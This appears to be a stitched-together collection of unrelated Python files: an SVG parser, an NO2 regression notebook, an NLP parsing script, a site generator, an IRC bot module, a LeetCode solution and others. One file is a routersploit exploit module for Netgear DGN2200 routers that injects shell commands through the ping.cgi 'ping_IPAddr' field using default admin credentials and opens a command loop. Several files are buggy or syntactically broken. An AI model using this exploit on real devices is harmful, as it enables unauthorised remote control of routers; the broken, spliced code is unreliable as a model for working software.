if not ('font-size' in attrib and 'x' in attrib and 'y' in attrib):
return None
font_size = float(attrib['font-size'])
width = font_size * 0.8 * max(1, len(t.text))
return BoundingBox(
float(attrib['x']),
float(attrib['y']),
width,
font_size
)
def _get_tag_attrib_name(scope, level):
return (
SVGE_NS_PREFIX + get_scoped_attrib_name(SCOPED_TAG_ATTRIB_SUFFIX, scope=scope, level=level)
if scope or level
else SVG_TAG_ATTRIB
)
class SvgStructuredDocument(AbstractStructuredDocument):
def __init__(self, root_or_roots):
if isinstance(root_or_roots, list):
self.page_roots = root_or_roots
else:
self.page_roots = [root_or_roots]
def get_pages(self):
return self.page_roots
def get_lines_of_page(self, page):
return page.findall('.//{}[@class="{}"]'.format(SVG_G, SvgStyleClasses.LINE))
def get_tokens_of_line(self, line):
return line.findall('./{}'.format(SVG_TEXT))
def get_x(self, parent):
return parent.attrib.get('x')
def get_text(self, parent):
return parent.text
def get_tag(self, parent, scope=None, level=None):
return parent.attrib.get(_get_tag_attrib_name(scope, level))
def set_tag(self, parent, tag, scope=None, level=None):
set_or_remove_attrib(parent.attrib, _get_tag_attrib_name(scope, level), tag)
def get_tag_by_scope(self, parent):
d = {
k[len(SVGE_NS_PREFIX):]: v
for k, v in get_attrib_by_scope(parent.attrib, SCOPED_TAG_ATTRIB_SUFFIX).items()
if k.startswith(SVGE_NS_PREFIX)
}
tag = self.get_tag(parent)
if tag:
d[None] = tag
return d
def get_bounding_box(self, parent):
return get_node_bounding_box(parent)
def set_bounding_box(self, parent, bounding_box):
parent.attrib[SVGE_BOUNDING_BOX] = format_bounding_box(bounding_box)
|
|
scripts_modules/colab_random_forest_regression.py
|
annapav7/NO2-tropomi_prediction_analysis
|
|
|
# -*- coding: utf-8 -*-
"""CoLab_Random Forest Regression.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1E4NOi3axBwvIHXiR47OKAAPzPMytJywY
# NO2 Prediction by using Machine Learning Regression Analyses in Google Earth Engine
## **Machine Learning can create a Model to Predict specific value base on existing data set (dependent and independent values).**
## **Introduction**
### **Nitrogen Dioxide (NO2) air pollution**.
The World Health Organization estimates that air pollution kills 4.2 million people every year.
The main effect of breathing in raised levels of NO2 is the increased likelihood of respiratory problems. NO2 inflames the lining of the lungs, and it can reduce immunity to lung infections.
There are connections between respiratory deceases / also exposure to viruses and more deadly cases.
##### ***Sources of NO2***:
The rapid population growth,
The fast urbanization:
* Industrial facilities
* Fossil fuels (coal, oil and gas)
* Increase of transportation – 80 %.
The affect air pollution (NO2): population health, and global warming.
## **Objective**
The theme of this project is to create a Model to Predict specific value (NO2) for past years base on existing data set (Landsat and Sentinel-5P(TROPOMI) images) for 2019. These Prediction can be used for Monitoring and Statistical Analyses of developing NO2 over Time.
"""
"""## **DataSet:**
The Sentinel-5P satellite with TROPOspheric Monitoring Instrument (TROPOMI) instrument provides high spectral resolution (7x3.5 km2) for all spectral bands to register level of NO2.
TROPOMI available from October 13, 2017.
Landsat satellite launched in 1972 and images are available for more then 40 years.
## **Concept:**
Regression:
The model can make generalizations about new data. The model has been learned from the training data, and can be used to predict the result of test data: here, we might be given an x-value, and the model would allow us to predict the y value. By drawing this separating line, we have learned a model which can generalize to new data.
## 1._ Install libraries
"""
!pip install earthengine-api
"""## 2._ Establish connection"""
!earthengine authenticate
"""**`Complete End to End Python code for Random Forest Regression:`**"""
# Import necessary Libraries
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import rasterio as rio
from rasterio.plot import show
# Import the data ( CSV formats)
data = pd.read_csv('name_of_file.csv')
data.head()
# Store the Data in form of dependent and independent variables separatly
X = data.ilog[:, 0:1].values
y = data.ilog[:, 1].values
# Import the Random Forest Regressor
from sklearn.ensemble import RandomForestRegressor
# Craete a Random Forest Regressor object from Random Forest Regressor Class
RFReg = RandomForestRegressor(n_estimators = 100, random_state = 0)
# Fit the random forest regressor with Training Data represented by X_train and y_train
RFReg.fit(X_train, y_train)
#Predicted Height from test dataset w.r.t Random Forest Regression
y_predict_rfr = RFReg.predict((X_test))
#Model Evaluation using R-Square for Random Forest Regression
from sklearn import metrics
r_square = metrics.r2_score(y_test, y_predict_rfr)
print('R-Square Error associated with Random Forest Regression is:', r_square)
''' Visualise the Random Forest Regression by creating range of values from min value of X_train to max value of X_train
having a difference of 0.01 between two consecutive values'''
X_val = np.arange(min(X_train), max(X_train), 0.01)
#Reshape the data into a len(X_val)*1 array in order to make a column out of the X_val values
X_val = X_val.reshape((len(X_val), 1))
#Define a scatter plot for training data
plt.scatter(X_train, y_train, color = 'blue')
#Plot the predicted data
plt.plot(X_val, RFReg.predict(X_val), color = 'red')
#Define the title
plt.title('NO2 prediction using Random Forest Regression')
#Define X axis label
plt.xlabel('NDVI')
#Define Y axis label
plt.ylabel('Level of NO2')
#Set the size of the plot for better clarity
plt.figure(figsize=(1,1))
#Draw the plot
plt.show()
# Predicting Height based on Age using Random Forest Regression
no2_pred = RFReg.predict([[41]])
print("Predicted NO2t: % d"% no2_pred)
"""**Model Evaluation**"""
#Model Evaluation using Mean Square Error (MSE)
print('Mean Squared Error:', metrics.mean_squared_error(y_test, y_predict))
#Model Evaluation using Root Mean Square Error (RMSE)
print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(y_test, y_predict)))
#Model Evaluation using Mean Absolute Error (MAE)
print('Mean Absolute Error:', metrics.mean_absolute_error(y_test, y_predict))
#Model Evaluation using R-Square
from sklearn import metrics
r_square = metrics.r2_score(y_test, y_predict)
print('R-Square Error:', r_square)
#For Illustration Purpose Only.
#Considering Multiple Linear Equation with two Variables : grade = a0 + a1*time_to_study + a2*class_participation
#Model Evaluation using Adjusted R-Square.
# Here n = no. of observations and p = no. of independent variables
n = 50
p = 2
Adj_r_square = 1-(1-r_square)*(n-1)/(n-p-1)
print('Adjusted R-Square Error:', Adj_r_square)
|
|
|
|
|
|
import sys
import fileinput
import argparse
import time
from collections import defaultdict, Counter
import itertools
import pickle
import os
import codecs
import argparse
from intervaltree import Interval, IntervalTree
from DataLoad import *
from SentenceModel import *
from java.util import *
from edu.stanford.nlp.pipeline import *
from edu.stanford.nlp.ling.CoreAnnotations import *
from edu.stanford.nlp.semgraph.SemanticGraphCoreAnnotations import *
pipeline = None
def getPipeline():
global pipeline
if pipeline is None:
props = Properties()
props.put("annotators", "tokenize, ssplit, pos, lemma, depparse");
pipeline = StanfordCoreNLP(props, False)
return pipeline
def within(pos,start,end):
return pos > start and pos < end
from __builtin__ import zip # To deal with Jython conflict with java Zip package
def parseTextWithTriggers(text,denotations,doTokenPreprocessing,knownEntities):
pipeline = getPipeline()
denotationTree = IntervalTree()
for id,(_,positions,_) in denotations.iteritems():
for a,b in positions:
denotationTree[a:b] = id
if doTokenPreprocessing:
prefixes = ["anti","phospho","translocation"]
prefixes += [ s[0].upper()+s[1:] for s in prefixes ]
suffixes = ["bound","degradable","driven","expressed","induced","induction","localized","luciferase","mediated","mediated way","nuclear","perforin","phosphorylated","Producing","promoter","promoting","secreting","silencing","simulated","transfected","translocation","costimulated","positve","regulated","responsive","independent","inducing","phosphorylation","stimulated","catalyzed","dimerization","expression","activated","reconstituted","associated","expressing","negative","producing","binding","positive","mediated","dependent","induced","deficient","protein","treatment"]
suffixes += [ s[0].upper()+s[1:] for s in suffixes ]
#print suffixes
for prefix in prefixes:
text = text.replace(prefix+"-",prefix+" ")
for suffix in suffixes:
text = text.replace("-"+suffix," "+suffix)
newTokens = []
position = 0
for tmpToken in text.split(' '):
startPos = position
endPos = position + len(tmpToken)
splitToken = None
triggers = denotationTree[startPos:endPos]
for interval in triggers:
if within(interval.begin,startPos,endPos):
#print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data]
#print "COOLA1\t%s\t%s" % (tmpToken,text[interval.begin:interval.end])
tmpSplitToken = text[interval.begin-1]
if tmpSplitToken in ['-','/']:
splitToken = tmpSplitToken
break
#print separator
elif within(interval.end,startPos,endPos):
#print "COOLA2\t%s\t%s" % (tmpToken,text[interval.begin:interval.end])
tmpSplitToken = text[interval.end]
if tmpSplitToken in ['-','/']:
splitToken = tmpSplitToken
break
#print tmpSplitToken
position += len(tmpToken) + 1
if splitToken is None:
newTokens.append(tmpToken)
else:
newTokens += tmpToken.split(splitToken)
text = u" ".join(newTokens)
allSentenceData = []
#print text
document = pipeline.process(text)
for sentence in document.get(SentencesAnnotation):
tokens = []
triggerLocations = defaultdict(list)
for i,token in enumerate(sentence.get(TokensAnnotation)):
word = token.word()
lemma = token.lemma()
partofspeech = token.tag()
startPos = token.beginPosition()
endPos = token.endPosition()
t = Token(word,lemma,partofspeech,startPos,endPos)
tokens.append(t)
triggers = denotationTree[startPos:endPos]
for interval in triggers:
triggerID = interval.data
triggerLocations[triggerID].append(i)
#if within(interval.begin,startPos,endPos) or within(interval.end,startPos,endPos):
#if within(interval.begin,startPos,endPos):
#print word, interval, startPos, endPos, text[interval.begin:interval.end] #denotations[interval.data]
#print "COOL1\t%s\t%s" % (word,text[interval.begin:interval.end])
#elif within(interval.end,startPos,endPos):
#print "COOL2\t%s\t%s" % (word,text[interval.begin:interval.end])
#print "-"*30
#print sentence
#sys.exit(0)
#dparse = sentence.get(BasicDependenciesAnnotation)
dparse = sentence.get(CollapsedCCProcessedDependenciesAnnotation)
dependencies = []
# Get the dependency graph
for edge in dparse.edgeIterable():
governor = edge.getGovernor()
governorIndex = governor.index()
dependent = edge.getDependent()
dependentIndex = dependent.index()
rel = edge.getRelation().getLongName()
dependencies.append((governorIndex-1, dependentIndex-1, rel))
# Let's gather up the information about the "known" triggers in the sentence (those from the A1 file)
eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes = {},{},{},{}
for triggerID,locs in triggerLocations.iteritems():
# Trigger is following tuple (typeName, positions, tokens)
triggerType,_,_ = denotations[triggerID]
if knownEntities is None or triggerType in knownEntities:
argumentTriggerLocs[triggerID] = locs
argumentTriggerTypes[triggerID] = triggerType
else:
eventTriggerLocs[triggerID] = locs
eventTriggerTypes[triggerID] = triggerType
sentenceData = SentenceModel(tokens, dependencies, eventTriggerLocs, eventTriggerTypes, argumentTriggerLocs, argumentTriggerTypes)
allSentenceData.append(sentenceData)
return allSentenceData
def findEventTrigger(sentenceData,triggerid):
for sentenceid, sentence in enumerate(sentenceData):
if triggerid in sentence.predictedEntityLocs:
return sentenceid,sentence.predictedEntityLocs[triggerid]
raise RuntimeError('Unable to find location of event trigger ID ('+triggerid+') in sentences')
def findArgumentTrigger(sentenceData):
for sentenceid, sentence in enumerate(sentenceData):
if triggerid in sentence.knownEntityLocs:
return sentenceid,sentence.knownEntityLocs[triggerid]
raise RuntimeError('Unable to find location of argument trigger ID ('+triggerid+') in sentences')
def isComplexEvent(eventTrigger,arguments):
if eventTrigger[0] == 'E':
return True
for _,id in arguments.iteritems():
if id[0] == 'E':
return True
return False
#def associatedEvents(sentenceData,events,modifiers,coreferences,equivalences):
# nonCom
# complexEvents = []
# for eventid,event in events.iteritems():
# (eventName, eventTrigger, arguments) = event
# isComplexEvent = False
# Event(eventName,
# It's the main bit. Yay!
if __name__ == "__main__":
argparser = argparse.ArgumentParser(description='Text parsing pipeline for a directory of text in ST or JSON format')
argparser.add_argument('--inDir', required=True, type=str, help='Directory containing input files')
argparser.add_argument('--format', default="ST", type=str, help='Format to load files (ST/JSON, default=ST)')
argparser.add_argument('--splitTokensForGE4', action='store_true', help='Whether to split tokens using GE4 logic')
argparser.add_argument('--knownEntities', help='Comma-separated list of entities that are known through-out')
argparser.add_argument('--outFile', required=True, type=str, help='Output filename for parsed-text data')
args = argparser.parse_args()
assert args.format == "ST" or args.format == "JSON", "--format must be ST or JSON"
inDir = args.inDir
outFile = args.outFile
print "inDir:", inDir
print "outFile:", outFile
if inDir[-1] != '/':
inDir = inDir + '/'
splitTokensForGE4 = False
if args.splitTokensForGE4:
splitTokensForGE4 = True
knownEntities = None
if args.knownEntities:
knownEntities = set(args.knownEntities.split(","))
allSentenceAndEventData = {}
for filename in os.listdir(inDir):
if args.format == "ST" and filename.endswith(".txt"):
filenameNoExt = filename[:-4]
prefix = inDir + filenameNoExt
txtFile = prefix + '.txt'
a1File = prefix + '.a1'
a2File = prefix + '.a2'
print "### Processing %s ###" % txtFile
assert os.path.exists(a1File), "Cannot find file: %s" % a1File
text,denotations,relations,modifications = loadDataFromSTFormat(txtFile,a1File,a2File)
sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities)
allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications)
elif args.format == "JSON" and filename.endswith(".json"):
filenameNoExt = filename[:-5]
jsonFile = inDir + filenameNoExt + '.json'
print "### Processing %s ###" % jsonFile
text,denotations,relations,modifications = loadDataFromJSON(jsonFile)
sentenceData = parseTextWithTriggers(text,denotations,splitTokensForGE4,knownEntities)
allSentenceAndEventData[filenameNoExt] = (sentenceData,relations,modifications)
with open(outFile, 'w') as f:
pickle.dump(allSentenceAndEventData, f)
print "Written to " + outFile
|
|
|
|
|
|
"""Generate site in output directory."""
from contextlib import contextmanager
import json
from pathlib import Path
from shutil import copytree, move, rmtree
from sqlite3 import Connection
import typing as t
from .app import App
from .graph import (
create_graph,
create_graph_data,
get_cluster,
get_components,
get_note_titles,
)
from .page import generate_index
from .utils import temporary_directory
data = Path(__file__).parent/"data"
Generator = t.Callable[[Path], None]
def clear(directory: Path) -> None:
"""Clear contents of directory.
Create directory if it doesn't exist.
"""
directory.mkdir(exist_ok=True)
for child in directory.iterdir():
if child.is_dir():
rmtree(child, ignore_errors=True)
else:
child.unlink()
@contextmanager
def output_directory_proxy(path: Path) -> t.Iterator[Path]:
"""Create proxy for output directory.
Afterwards path is emptied and all contents of tempdir are moved into path.
"""
assert not path.exists() or path.is_dir()
with temporary_directory() as tempdir:
yield tempdir
clear(path)
for child in tempdir.iterdir():
move(str(child), str(path))
class IndexGenerator:
"""Generates index.html."""
def __init__(self, app: App):
self.app = app
def run(self, out: Path) -> None:
"""Generate index.html inside output directory."""
generate_index(self.app, out)
def copy(source: Path, dest: Path) -> None:
"""Copy text from source to dest Path."""
dest.write_bytes(source.read_bytes())
def generate_js(out: Path) -> None:
"""Generate app.js inside output directory."""
copy(data/"app.min.js", out/"app.min.js")
def generate_css(out: Path) -> None:
"""Generates style.css"""
copy(data/"app.min.css", out/"app.min.css")
copy(data/"style.css", out/"style.css")
def generate_favicons(out: Path) -> None:
"""Copy favicons."""
for path in data.joinpath("favicons").iterdir():
if path.name != "about.txt":
copy(path, out/path.name)
def copy_boxicons(out: Path) -> None:
"""Copy boxicons svgs."""
copytree(data/"svg", out/"assets"/"boxicons"/"svg")
def copy_mathjax(out: Path) -> None:
"""Copy mathjax files."""
copytree(data/"es5", out/"es5")
class ImagesGenerator:
"""Copies images from database into output directory."""
def __init__(self, con: Connection):
self.con = con
def run(self, out: Path) -> None:
"""Copy images into output directory."""
(out/"images").mkdir()
sql = "SELECT filename, binary FROM Images"
for filename, binary in self.con.execute(sql):
image = out/filename
image.write_bytes(binary)
class CytoscapeDataGenerator:
"""Generate JSONs for cytoscape.js."""
def __init__(self, con: Connection):
self.con = con
self.graph = create_graph(con)
self.titles = dict(get_note_titles(self.con))
def write(self, path: Path, graph: t.Any, layout: str = "fdp") -> None: # noqa; # pylint: disable=no-self-use
"""Write graph JSON data to path."""
graph_data = create_graph_data(self.con, self.titles, graph, layout)
path.write_text(json.dumps(graph_data))
def run(self, out: Path) -> None:
"""Generate JSONs for cytoscape.js in out/graph."""
(out/"graph").mkdir()
layout = "dot" if self.graph.order() < 100 else "fdp"
self.write(out/"graph"/"data.json", self.graph, layout)
(out/"graph"/"tag").mkdir()
for tag, in self.con.execute("SELECT DISTINCT tag FROM Tags"):
path = out/"graph"/"tag"/f"{tag[1:]}.json"
self.write(path, get_cluster(self.graph, tag), "dot")
(out/"graph"/"note").mkdir()
for component, subgraph in get_components(self.graph).items():
graph_data = create_graph_data(
self.con,
self.titles,
subgraph,
"dot",
)
for note_id in component:
path = out/"graph"/"note"/f"{note_id}.json"
path.write_text(json.dumps(graph_data))
self.con.commit()
def compile_site(app: App) -> None:
"""Copy files into output directory."""
assert app.root is not None
con = app.database
output_directory = app.root/app.config.output_directory
with output_directory_proxy(output_directory) as tempdir:
CytoscapeDataGenerator(con).run(tempdir)
ImagesGenerator(con).run(tempdir)
IndexGenerator(app).run(tempdir)
generate_css(tempdir)
generate_js(tempdir)
generate_favicons(tempdir)
copy_boxicons(tempdir)
copy_mathjax(tempdir)
|
|
src/generated-spec/work_spaces.py
|
wheerd/cloudformation-to-terraform
|
|
|
from . import *
class AWS_WorkSpaces_Workspace_WorkspaceProperties(CloudFormationProperty):
def write(self, w):
with w.block("workspace_properties"):
self.property(w, "ComputeTypeName", "compute_type_name", StringValueConverter())
self.property(w, "RootVolumeSizeGib", "root_volume_size_gib", BasicValueConverter())
self.property(w, "RunningMode", "running_mode", StringValueConverter())
self.property(w, "RunningModeAutoStopTimeoutInMinutes", "running_mode_auto_stop_timeout_in_minutes", BasicValueConverter())
self.property(w, "UserVolumeSizeGib", "user_volume_size_gib", BasicValueConverter())
class AWS_WorkSpaces_Workspace(CloudFormationResource):
cfn_type = "AWS::WorkSpaces::Workspace"
tf_type = "aws_workspaces_workspace"
ref = "id"
attrs = {} # Additional TF attributes: computer_name, ip_address, state
def write(self, w):
with self.resource_block(w):
self.property(w, "BundleId", "bundle_id", StringValueConverter())
self.property(w, "DirectoryId", "directory_id", StringValueConverter())
self.property(w, "RootVolumeEncryptionEnabled", "root_volume_encryption_enabled", BasicValueConverter())
self.property(w, "Tags", "tags", ListValueConverter(ResourceTag()))
self.property(w, "UserName", "user_name", StringValueConverter())
self.property(w, "UserVolumeEncryptionEnabled", "user_volume_encryption_enabled", BasicValueConverter())
self.property(w, "VolumeEncryptionKey", "volume_encryption_key", StringValueConverter())
self.block(w, "WorkspaceProperties", AWS_WorkSpaces_Workspace_WorkspaceProperties)
|
|
Adder&Subtractor/adder+subtractor module/testbench& SW/adder-test.py
|
|
|
|
import sys
f = open("testfile.txt", "r")
out = open("test_out.txt", "w")
x = f.readline()
while x:
numbers = x.split()
A = numbers[0]
B = numbers[1]
result = bin(int(A,2) + int(B,2))
# out.write(A+"\n")
#out.write(B+"\n")
result = int(result,2)
result = str(result)
out.write(result+"\n")
x = f.readline()
out.close()
f.close()
|
|
Python/python code samples/test cases/FileTestSuite.py
|
|
|
|
import unittest
import os
class FileTestSuite(unittest.TestCase)
def test_if_file_exist(self) :
path = "C:\Ussers\Vince\Desktop\do_not_exist.txt"
self.assertTrue(!os.path.isfile( path ), 'The file should not exist')
def test_if_html_contains_div(self)
html = "<body><div>here</div></body>"
pos = html.find('<div>')
self.assertTrue( len(pos) == 1, 'The HTML does contain div\'s')
def test_if_html_does_not_contain_a_div(self)
html = "<body>walla walla washington</body>"
pos = html.find('<div>')
self.assert( pos == -1, "The HTML does not contain div's")
def refactor(aList):
sum = 0
if len(aList) == 0:
return False, 0
for eachItem in aList:
isValidNumber = str(eachItem).isdigit()
if isValidNumber == False:
return False, 0
else:
sum = sum + eachItem
return True, sum
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(UnitTestSuite))
return suite
|
|
DIZED_APPS/INCANTATION/modules/exploits/routers/netgear/dgn2200_ping_cgi_rce.py
|
tanc7/ArmsCommander-TestBed
|
|
|
from routersploit import (
exploits,
print_error,
print_success,
print_status,
mute,
validators,
http_request,
random_text,
shell,
)
class Exploit(exploits.Exploit):
"""
Exploits Netgear DGN2200 RCE vulnerability in ping.cgi
"""
__info__ = {
'name': 'Netgear DGN2200 RCE',
'description': 'Exploits Netgear DGN2200 RCE vulnerability in the ping.cgi script',
'authors': [
'SivertPL', # vulnerability discovery
'<NAME> <<EMAIL>[at]<EMAIL>>', # routesploit module
],
'references': [
'https://www.exploit-db.com/exploits/41394/',
'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-6077',
],
'devices': [
'Netgear DGN2200v1',
'Netgear DGN2200v2',
'Netgear DGN2200v3',
'Netgear DGN2200v4',
],
}
target = exploits.Option('', 'Target address e.g. http://192.168.1.1', validators=validators.url) # target address
port = exploits.Option(80, 'Target Port') # target port
login = exploits.Option('admin', 'Username')
password = exploits.Option('password', 'Password')
def run(self):
"""
Method run on "exploit" or "run" command (both works the same way). It should result in exploiting target.
"""
if self.check():
print_success("Target is vulnerable")
print_status("Invoking command loop...")
shell(self, architecture="mipsbe")
else:
print_error("Target is not vulnerable")
def execute(self, command):
url = "{}:{}/ping.cgi".format(self.target, self.port)
data = {'IPAddr1': 12, 'IPAddr2': 12, 'IPAddr3': 12, 'IPAddr4': 12, 'ping': "Ping", 'ping_IPAddr': "12.12.12.12; " + command}
referer = "{}/DIAG_diag.htm".format(self.target)
headers = {'referer': referer}
r = http_request(method="POST", url=url, data=data, auth=(self.login, self.password), headers=headers)
if r is None:
return ""
result = self.parse_output(r.text)
return result.encode('utf-8')
def parse_output(self, text):
yet = False
result = []
for line in text.splitlines():
if line.startswith("<textarea"):
yet = True
continue
if yet:
if line.startswith("</textarea>"):
break
result.append(line)
return "\n".join(result)
@mute
def check(self):
"""
Method that verifies if the target is vulnerable.
"""
rand_marker = random_text(6)
command = "echo {}".format(rand_marker)
if rand_marker in self.execute(command):
return True
return False
|
|
antigen_discovery/nepitope/peptide_utilities.py
|
|
|
|
import os
import glob
from shutil import move, rmtree
from nepitope import net_MHC_interface
import importlib
importlib.reload(net_MHC_interface)
class Swaps(object):
list_AA = ['A', 'R', 'N', 'D', 'C', 'Q', 'E', 'G', 'H', 'I', 'L', 'K', 'M', 'F', 'P', 'S', 'T', 'W', 'Y', 'V']
def __init__(self, high_affinity_df, fasta_file_dir, net_mhc_path, proteins=None):
self.df = high_affinity_df
self.protein_ids = self._get_prot_ids(proteins)
#self.protein_input_df = self.df[self.df.ID.isin(self.protein_ids)]
self.fasta_dir = fasta_file_dir
self.mhc_path = net_mhc_path
def find_swaps_write_to_fasta(self):
nmers = self._get_nmers(self.df)
alleles = self._get_alleles(self.df)
mhc_commands = []
for prot_id in self.protein_ids:
try:
os.mkdir(self.fasta_dir + '%s/' % prot_id)
except:
pass
for nmer in nmers:
for allele in alleles:
sliced = self._slice_df(nmer, allele, prot_id)
if self.check_size(sliced):
list_of_lists = sliced[['n-mer', 'Allele', 'ID', 'Pos', 'Peptide']].values.tolist()
for item in list_of_lists:
swaps = self._create_swaps(item[-1])
fasta_file = self._open_write_fasta(item, swaps, prot_id)
self._create_mhc_command(item, fasta_file)
self.reorg_files(prot_id)
return mhc_commands
def reorg_files(self, prot_id):
prot_dir = self.fasta_dir + '%s' % prot_id
dirs = glob.glob(prot_dir + '/mhc_preds*')
final_dest = prot_dir + '/preds_per_swap'
try:
os.mkdir(final_dest)
except:
pass
for i in dirs:
file_source = glob.glob(i + '/*.xls')
move(file_source[0], final_dest)
print('Swap predictions regrouped to %s' % final_dest)
for i in dirs:
rmtree(i)
def _create_mhc_command(self, item, fasta_location):
nmer = [item[0]]
allele = [item[1]]
net_mhc = net_MHC_interface.netMHCComand(self.mhc_path, fasta_location, nmers=nmer, alleles=allele)
net_mhc.create_text_command(write_to_txt=True)
net_mhc.run_netMHC()
def _open_write_fasta(self, data, swaps, prot_id):
file_name = "_".join([self.fasta_dir + '%s/' % prot_id, 'swap', data[-1], 'Pos', str(data[-2]), 'ID', str(data[-3]).replace('_', '-'),
'Allele', str(data[-4]), 'nmer', str(data[-5])])
with open(file_name + '.fasta', 'w') as inf:
for swap in swaps:
inf.write("".join(['>', prot_id, '_', swap, '\n']))
inf.write(swap + '\n')
return file_name + '.fasta'
def _create_swaps(self, peptide):
list_peps = []
for i in range(len(peptide)):
for k in range(len(self.list_AA)):
list_peps.append(self._insert_aa(peptide, i, self.list_AA[k]))
return list_peps
def _slice_df(self, nmer, allele, prot_id):
return self.df.loc[(self.df['n-mer'] == nmer) & (self.df['Allele'] == allele) & (self.df['ID'] == prot_id)]
@staticmethod
def _insert_aa(string, index, aa):
hash_string = list(string)
del hash_string[index]
hash_string.insert(index, aa)
return "".join(hash_string)
def _get_prot_ids(self, proteins):
if proteins == 'All':
return list(self.df['ID'].unique())
if isinstance(proteins, list):
return self.check_existence(proteins)
def check_existence(self, proteins):
for protein in proteins:
if protein not in self.df.ID.unique():
raise ValueError('Input protein %s not found in csv files' % protein)
return proteins
@staticmethod
def _get_nmers(pepdata):
return pepdata['n-mer'].unique()
@staticmethod
def _get_alleles(pepdata):
return pepdata['Allele'].unique()
@staticmethod
def check_size(sliced):
if len(sliced) == 0:
return False
else:
return True
|
|
modules/autodeop/autodeop.py
|
|
|
|
# -*- coding: utf-8 -*-
from pycobot.pycobot import BaseModel
from peewee.peewee import CharField
from irc import client
class autodeop:
def __init__(self, core, client):
core.addCommandHandler("autodeop", self, cpriv=6, cprivchan=True, chelp=
"Activa o desactiva el autodeop en un canal. Sintaxis: autodeop <canal>"
" <on/off>")
try:
autodeopt.create_table(True)
except:
pass
core.addHandler("mode", self, "modeprot")
def autodeop_p(self, bot, cli, event):
if len(event.splitd) > 0:
return event.splitd[0]
return 1
def autodeop(self, bot, cli, ev):
if len(ev.splitd) < 1:
cli.msg(ev.target, "\00304Error\003: Faltan parametros.")
return 1
ch = autodeopt.select().where(autodeopt.channel == ev.splitd[0])
if ev.splitd[1] == "on":
if ch.count() == 0:
autodeopt.create(channel=ev.splitd[0])
cli.msg(ev.target, "Se ha activado el autodeop en \2" +
ev.splitd[0])
else:
cli.msg(ev.target, "\00304Error\003: El autodeop ya esta a"
"ctivado en el canal \2" + ev.splitd[0])
else:
if ch.count() != 0:
r = autodeopt.get(autodeopt.channel == ev.splitd[0])
r.delete_instance()
cli.msg(ev.target, "Se ha desactivado el autodeop en \2" +
ev.splitd[0])
else:
cli.msg(ev.target, "\00304Error\003: El autodeop no esta a"
"ctivado en el canal \2" + ev.splitd[0])
def modeprot(self, cli, ev):
c = autodeopt.get(autodeopt.channel == ev.target)
if c is False:
return 1
if client.parse_nick(ev.source)[1] == cli.nickname:
return 1
x = self.parsemode(cli, ev)
for w in x:
if w == cli.nickname:
continue
cli.mode(ev.target, "-o " + w)
def parsemode(self, cli, ev):
res = []
cmodelist = cli.features.chanmodes
param = cmodelist[0] + cmodelist[1] + cmodelist[2]
for i, val in enumerate(cli.features.prefix):
param = param + cli.features.prefix[val]
pos = 0
for c in ev.arguments[0]:
if c == "-":
rving = False
pass
elif c == "+":
rving = True
else:
if c in param:
pos = pos + 1
if rving is False:
continue
if c == "o":
res.append(ev.arguments[pos]) # BEEP BEEP BEEP BEEP
return res
class autodeopt(BaseModel):
channel = CharField(primary_key=True)
class Meta:
db_table = "autodeop"
|
|
esphomeyaml/components/sensor/bmp085.py
|
johnerikhalse/esphomeyaml
|
|
|
import voluptuous as vol
import esphomeyaml.config_validation as cv
from esphomeyaml.components import sensor
from esphomeyaml.const import CONF_ADDRESS, CONF_MAKE_ID, CONF_NAME, CONF_PRESSURE, \
CONF_TEMPERATURE, CONF_UPDATE_INTERVAL
from esphomeyaml.helpers import App, Application, HexIntLiteral, add, variable
DEPENDENCIES = ['i2c']
MakeBMP085Sensor = Application.MakeBMP085Sensor
PLATFORM_SCHEMA = sensor.PLATFORM_SCHEMA.extend({
cv.GenerateID(CONF_MAKE_ID): cv.declare_variable_id(MakeBMP085Sensor),
vol.Required(CONF_TEMPERATURE): cv.nameable(sensor.SENSOR_SCHEMA),
vol.Required(CONF_PRESSURE): cv.nameable(sensor.SENSOR_SCHEMA),
vol.Optional(CONF_ADDRESS): cv.i2c_address,
vol.Optional(CONF_UPDATE_INTERVAL): cv.update_interval,
})
def to_code(config):
rhs = App.make_bmp085_sensor(config[CONF_TEMPERATURE][CONF_NAME],
config[CONF_PRESSURE][CONF_NAME],
config.get(CONF_UPDATE_INTERVAL))
bmp = variable(config[CONF_MAKE_ID], rhs)
if CONF_ADDRESS in config:
add(bmp.Pbmp.set_address(HexIntLiteral(config[CONF_ADDRESS])))
sensor.setup_sensor(bmp.Pbmp.Pget_temperature_sensor(), bmp.Pmqtt_temperature,
config[CONF_TEMPERATURE])
sensor.setup_sensor(bmp.Pbmp.Pget_pressure_sensor(), bmp.Pmqtt_pressure,
config[CONF_PRESSURE])
BUILD_FLAGS = '-DUSE_BMP085_SENSOR'
|
|
Python3/0909-Snakes-and-Ladders/soln-1.py
|
wyaadarsh/LeetCode-Solutions
|
|
|
class Solution:
def snakesAndLadders(self, board: List[List[int]]) -> int:
# this is a bfs
def num_to_rc(num):
N = len(board)
num -= 1
r, c = divmod(num, N)
if r % 2:
c = N - 1 - c
r = N - 1 - r
return r, c
frontier = collections.deque([1])
seen = {1}
target = len(board) * len(board)
step = 0
while frontier:
sz = len(frontier)
for _ in range(sz):
x = frontier.popleft()
if x == target:
return step
for dx in range(1, 7):
nx = x + dx
if nx <= target:
r, c = num_to_rc(nx)
if board[r][c] != -1:
nx = board[r][c]
if nx not in seen:
seen.add(nx)
frontier.append(nx)
step += 1
return -1
|
|
orchestrate_ai/mirex_lyrics_dataset/trainer.py
|
|
|
|
import computation_graph
""" Trains Lyrics Dataset
Runs training in computation graph
"""
def train_lyrics():
computation_graph.train_lyrics()
|
|
|
JacksonOsvaldo/bc_calcado-vendas
|
|
|
from django.shortcuts import render, resolve_url
from django.http import HttpResponseRedirect
from django.core.urlresolvers import reverse_lazy
from django.db.models import F, Count
from django.views.generic import TemplateView, ListView, DetailView
from django.views.generic.edit import UpdateView
from django.forms.models import inlineformset_factory
from .models import Customer, Seller, Brand, Product, Sale, SaleDetail
from .forms import SaleForm, SaleDetailForm
from .mixins import CounterMixin, FirstnameSearchMixin
